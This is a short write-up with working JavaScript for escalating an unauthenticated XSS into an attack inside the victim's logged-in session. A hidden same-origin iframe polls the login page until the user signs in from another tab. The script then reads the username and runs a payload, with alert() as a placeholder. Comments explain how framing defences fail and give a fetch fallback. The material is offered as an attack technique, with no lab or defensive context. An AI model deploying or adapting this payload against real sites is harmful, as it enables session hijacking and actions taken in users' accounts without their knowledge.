Simple trick to escalate an XSS that fires in an unauthenticated context into one that runs inside the victim's session: the payload keeps polling a hidden same-origin iframe until the user logs in from another tab of the same browser (same cookie jar), then fires.
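// Hidden same-origin iframe used to poll the target's login page from inside
// the victim's browser; it shares the cookie jar with the page the XSS runs on.
// Declared explicitly instead of as an implicit global.
const frame = document.createElement("iframe");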
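/**
 * Poll the hidden iframe until it no longer shows the login page, then run
 * the payload once in the victim's authenticated context.
 *
 * Relies on the globals set up by the surrounding script: `frame` (the hidden
 * iframe) and `auth_checker` (the setInterval handle), which this function
 * clears once the attack has fired.
 *
 * Returns true once the authenticated page was detected and the payload ran,
 * false while still waiting (in which case the frame is reloaded for the
 * next poll).
 */
function test_auth() {
  console.log("Checking auth state...");
  // The frame may not have finished (re)loading, or the page may lack the
  // expected <h1>; treat that as "not yet" rather than throwing from the
  // interval callback.
  const doc = frame.contentDocument;
  const h1 = doc ? doc.getElementsByTagName("h1")[0] : undefined;
  const heading = h1 ? h1.children[0] : undefined;
  if (!heading) {
    frame.src += ""; // trick to force iframes to reload
    return false;
  }
  const title = heading.innerText;
  // Heuristic: the login page's <h1> reads "Login"; anything else is taken
  // as the post-login page. Note that an error page would also pass this
  // check -- tighten it for the target application.
  if (title === "Login") {
    frame.src += ""; // trick to force iframes to reload
    return false;
  }
  // Stop polling first so the payload cannot fire twice; no further reload
  // is needed once we are done with the frame.
  clearInterval(auth_checker);
  // Keep the username local: the original assigned to an implicit global
  // `name`, which in a browser is window.name -- it survives navigation and
  // is readable by whatever document is loaded into this window next.
  // Assumes the heading looks like "Welcome back, <user>"; adjust the index
  // for the target page.
  const victim = title.split(" ")[2];
  console.log(`Performing attack against user: ${victim}!`);
  alert(`Hello, ${victim}`); // placeholder for the real authenticated payload
  return true;
}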
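// Load the login page into the hidden frame. Because the XSS runs on the
// same origin, X-Frame-Options: SAMEORIGIN does not stop this; only DENY (or
// a CSP frame-ancestors directive that excludes this origin) does. If framing
// is blocked, fall back to fetching the page with XMLHttpRequest/fetch and
// inspecting the response body instead.
frame.src = "login"; // relative URL, so the request stays same-origin
frame.style.display = "none";
document.body.append(frame);
// Poll once a second; test_auth() clears this interval itself once it sees
// the authenticated page. Declared explicitly instead of as an implicit global.
const auth_checker = setInterval(test_auth, 1000);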